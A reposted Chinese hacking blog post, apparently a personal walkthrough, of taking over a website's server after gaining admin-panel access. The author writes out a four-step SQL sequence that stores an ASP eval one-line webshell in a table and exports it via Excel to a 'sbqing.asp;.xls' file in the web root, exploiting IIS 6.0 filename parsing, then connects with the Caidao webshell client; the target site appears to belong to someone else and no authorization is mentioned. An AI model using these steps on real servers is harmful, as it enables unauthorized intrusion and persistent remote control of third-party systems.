利用Sql语句拿shell
【转载】
昨天某基友找我帮他拿个shell,如上图,四点后,我当时在网吧,然后远程给他看了下,后台功能挺多的,但是没法上传,站点设置能修改上传的后缀,虽然直接改成asp被拦截为非法后缀,不过我相信可以绕过,可是,这不是问题,问题是,没写入权限,看图:
基本设置,点击保存,提示这个,目测是没有写入权限的原因。当然,这也还不算问题,真正的问题,让你们吐血。。
我不会告诉你们,我传的是正常的,没有加一句话的JPG图片。。。这里上传任何文件都提示不允许上传。。
我问基友还有没有别的地方有上传,他说找了半天就这里有,这站服务器不稳定,听说还是独服呢,卡的要死,有时候刷新3、4分钟都没反应,有时候呢又还正常。。 只能说,这站垃圾的要死。。我都没继续的心情了。。现在还出现这样的坑爹的情况,当时又还忙着做事,就没看了。
然后今天回到家里,顺手打开看了下,速度正常了,那我就在继续看看吧。
我看了下这站有数据库备份功能,原本想插马备份成asa后缀的,结果。。
需处于维护状态,要改成维护状态,需要在上面的站点设置里面更改,而站点设置根本没法更改啊。所以,再次苦逼了。
然后我想到了昨天有看到过sql语句这个功能,当时没看,所以我现在在看看那个功能呢,
我执行了下sql语句试试,居然可以。。好嘛,看来有戏,直接用sql语句来写shell吧。
物理路径,在后台首页就有显示,并且也显示了服务器是iis6.0,对了,说下,目测这个程序是南方精良,根据后台界面和网站的一些文件,我估计是南方精良改的,不过他不是用的ewe编辑器,他这个编辑器也没法上传图片。
现在,我们执行sql语句写shell吧~
1
2
3
4
5
6
7
8
9
10
11
12
|
第一步:
create table sbqing (a varchar(50)) //建立sbqing表
第二步:
insert into sbqing (a) values ('<%eval request("sbqing")%>') //写入a字段到sbqing表,a字段内容为一句话
第三步:
select * into [a] in 'E:\wwwroot\admin\sbqing.asp;.xls' 'excel 4.0;' from sbqing
//导出sbqing表 a字段的内容到E....
第四步:
drop table sbqing //删除sbqing表
|
一路都没提示出错,那么直接菜刀连接吧~
好嘛,就这么秒了。。。额,注意哦,我这个站是iis6.0,所以我导出的马儿文件名是这个,马儿文件名因站而异、
shell拿下了,基友的任务也完成了,唔,刚随手看了下,目录居然都可读,shell组件也还存在,那应该提权容易吧,我就不继续了,最近事情很多,忙死了。
文章来自:http://sbqing.com/1981.html
lz的文章写的都非常好 想跟lz交个朋友 我的联系方式 QQ275984452